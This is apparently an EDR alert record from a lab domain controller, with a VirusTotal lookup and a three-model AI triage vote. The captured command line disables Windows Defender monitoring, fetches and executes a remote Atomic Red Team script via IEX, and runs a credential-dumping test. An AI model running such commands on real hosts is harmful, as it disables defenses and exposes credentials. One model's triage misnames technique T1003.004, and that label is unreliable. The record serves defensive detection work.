{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 210673664,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 3600,
        "THIS_ATOM": "603c0894c1efd30bc14ce13269c2a84d",
        "THREADS": 3,
        "TIMESTAMP": 1774364748698,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3600,
      "PROCESS_ID": 9092,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
      "event_time": 1774364749274,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2841,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "603c0894c1efd30bc14ce13269c2a84d",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "ce62e2fb3788a5371aa5449e69c2a84f"
    }
  },
  "detect_id": "0c5a2547-75e5-4543-9445-bab569c2a850",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364752115,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364749\u0026selected=ce62e2fb3788a5371aa5449e69c2a84f",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
    "event_time": 1774364749274,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2841,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "603c0894c1efd30bc14ce13269c2a84d",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "ce62e2fb3788a5371aa5449e69c2a84f"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364752000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.883,
  "false_positive_reason": null,
  "investigation_questions": [
    "Is there a change ticket or authorization record for Atomic Red Team testing on this date?",
    "Were any actual credentials extracted or was the test run with dummy data?"
  ],
  "ioc_analysis": "The PowerShell command line includes \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, which is a high-confidence indicator of defense evasion (T1562.001). It also downloads the \u0027install-atomicredteam.ps1\u0027 script from the official Red Canary GitHub repository, confirming the use of red team tools.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "Set-MpPreference -DisableRealtimeMonitoring $true"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1003.004",
    "T1059.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Verify with the security team if Atomic Red Team testing was authorized on this host.",
    "Confirm that Windows Defender Real-Time Monitoring was re-enabled after the test completion.",
    "Monitor for any signs of credential exfiltration or lateral movement originating from this host."
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThe detection triggered due to PowerShell being used to disable Windows Defender Real-Time Monitoring and subsequently download and execute Atomic Red Team tests, specifically focusing on credential dumping (T1003.004). The command line is explicitly identified as Atomic Red Team installation and test execution, which correctly matches the detection rule for defense impairment.\n\n**IOC Analysis:** The PowerShell command line includes \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, which is a high-confidence indicator of defense evasion (T1562.001). It also downloads the \u0027install-atomicredteam.ps1\u0027 script from the official Red Canary GitHub repository, confirming the use of red team tools.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis detection represents a confirmed malicious activity where PowerShell is executing an Atomic Red Team (ART) attack module to disable real-time monitoring and test T1003.004 (Abuse of Software Update Services). The process is running under SYSTEM privileges from System32 but the command line contains clear indicators of an active attack.\n\n**IOC Analysis:** The PowerShell command explicitly disables real-time monitoring via Set-MpPreference, downloads and executes code from a GitHub repository using IEX (Invoke-Expression), and runs Atomic Red Team tests. While the process path is legitimate (System32) and signed, the behavior is malicious because it combines policy manipulation with remote code execution to test exploit capabilities.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection event involves a PowerShell process from the legitimate System32 directory executing commands to disable Windows Defender real-time monitoring and install AtomicRedTeam, a tool often associated with red teaming. This behavior is suspicious and could indicate an attack attempt.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a known legitimate Windows system binary located in its expected directory. The hash is signed, indicating it\u0027s likely Microsoft-signed. However, the command line shows malicious activity, including disabling security features and installing potentially harmful tools. The parent process is cmd.exe from System32, which is legitimate, but invoked from a temporary script, raising suspicion.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}